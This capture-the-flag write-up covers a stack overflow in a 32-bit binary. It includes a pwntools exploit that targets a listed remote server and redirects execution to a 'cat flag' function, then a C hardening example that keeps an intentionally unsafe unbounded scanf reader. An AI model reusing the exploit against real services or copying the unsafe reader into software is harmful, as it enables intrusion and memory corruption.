forgot
The binary is 32-bit.
fgets(s, 32, stdin) limits the read to 32 characters, so it cannot be exploited.
__isoc99_scanf("%s", v2) is a classic stack overflow.
Found a function that runs cat flag.
Overwrite from v2 up through v3 with the address of the cat flag function.
exp:
from pwn import *
context(os='linux', arch='i386', log_level='debug')   # 32-bit target, so i386 rather than amd64
io = remote('61.147.171.105', '56662')
door = 0x80486CC                      # address of the function that runs cat flag
io.recvuntil(b'>')
payload = b'aaaa'                     # first prompt is the bounded fgets read; any short input will do
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)        # fill from v2 up to the slot being overwritten
payload1 = padding + p32(door)        # second prompt is the unbounded scanf("%s") read
io.sendline(payload1)
io.interactive()
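The root cause the write-up identifies is the unbounded scanf("%s") read sitting next to an fgets(s, 32, stdin) read that was already bounded. The following is an added C example, not code from the challenge binary or from the write-up: it keeps the unsafe pattern as a reference and shows two bounded replacements (a width-limited scanf and an fgets read that drains over-long lines), each reporting when input was cut. The 32-byte capacity mirrors the fgets call on the page; the input strings, the function names and the read_result type are constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NAME_CAP 32   /* same capacity as the binary's fgets(s, 32, stdin) */

/* The unsafe pattern the write-up flags: "%s" carries no width, so scanf
 * copies the whole token into the buffer however long it is and runs past
 * the end into neighbouring stack slots. Kept only as a reference for what
 * not to write; nothing below calls it. */
void read_name_unbounded(char *name) {
    if (scanf("%s", name) != 1) name[0] = '\0';
}

/* Result of one read: rc is 1 for a clean read, 2 if the input was longer
 * than the buffer allows (caller should reject it), 0 if nothing was read. */
typedef struct { int rc; size_t len; } read_result;

/* Hardened form 1: give scanf a width of cap-1, leaving room for the
 * terminator. sscanf on an in-memory string is used so the behaviour can
 * be exercised offline; with stdin the format string would be the same. */
int read_name_bounded(const char *input, char *name, size_t cap) {
    char fmt[24];
    int consumed = 0;
    name[0] = '\0';
    if (cap < 2) return 0;
    /* builds e.g. "%31s%n" from the buffer capacity at run time */
    snprintf(fmt, sizeof fmt, "%%%zus%%n", cap - 1);
    if (sscanf(input, fmt, name, &consumed) != 1) return 0;
    /* if the next unread byte still belongs to the token, it was cut short */
    if (input[consumed] != '\0' && !isspace((unsigned char)input[consumed]))
        return 2;
    return 1;
}

/* Hardened form 2: fgets() with the buffer size, as the binary already did
 * for its first prompt. The newline is stripped, and an over-long line is
 * drained to its end so the excess cannot spill into the next read. */
int read_line_bounded(FILE *in, char *name, size_t cap) {
    int c, truncated = 0;
    if (!fgets(name, (int)cap, in)) { name[0] = '\0'; return 0; }
    size_t n = strlen(name);
    if (n > 0 && name[n - 1] == '\n') { name[n - 1] = '\0'; return 1; }
    /* no newline: either the line exceeded the buffer or EOF ended it */
    while ((c = fgetc(in)) != EOF && c != '\n') truncated = 1;
    return truncated ? 2 : 1;
}

/* Run one bounded scanf read into a fresh NAME_CAP buffer and report it. */
read_result probe_scanf(const char *input) {
    char buf[NAME_CAP];
    read_result r;
    r.rc = read_name_bounded(input, buf, sizeof buf);
    r.len = strlen(buf);
    return r;
}

/* Same for the fgets form; a tmpfile() stands in for stdin (standard C). */
read_result probe_fgets(const char *input) {
    char buf[NAME_CAP];
    read_result r = {0, 0};
    FILE *in = tmpfile();
    if (!in) return r;
    fputs(input, in);
    rewind(in);
    r.rc = read_line_bounded(in, buf, sizeof buf);
    r.len = strlen(buf);
    fclose(in);
    return r;
}

/* Constructed inputs: a short name and a 100-byte token, i.e. the kind of
 * input that overruns a 32-byte buffer under the unbounded read. */
#define LONG_TOKEN "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" \
                   "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"

int main(void) {
    read_result r;
    r = probe_scanf("alice\n");
    printf("bounded scanf, short: rc=%d len=%zu\n", r.rc, r.len);
    r = probe_scanf(LONG_TOKEN);
    printf("bounded scanf, long : rc=%d len=%zu\n", r.rc, r.len);
    r = probe_fgets(LONG_TOKEN);
    printf("fgets, long         : rc=%d len=%zu\n", r.rc, r.len);
    return 0;
}
```

Both hardened readers stop at 31 characters for the 100-byte token and report rc=2, which is the signal a program should act on (reject the input or re-prompt) instead of silently keeping a truncated value; the unbounded form has no such stopping point, which is exactly the gap the write-up exploits.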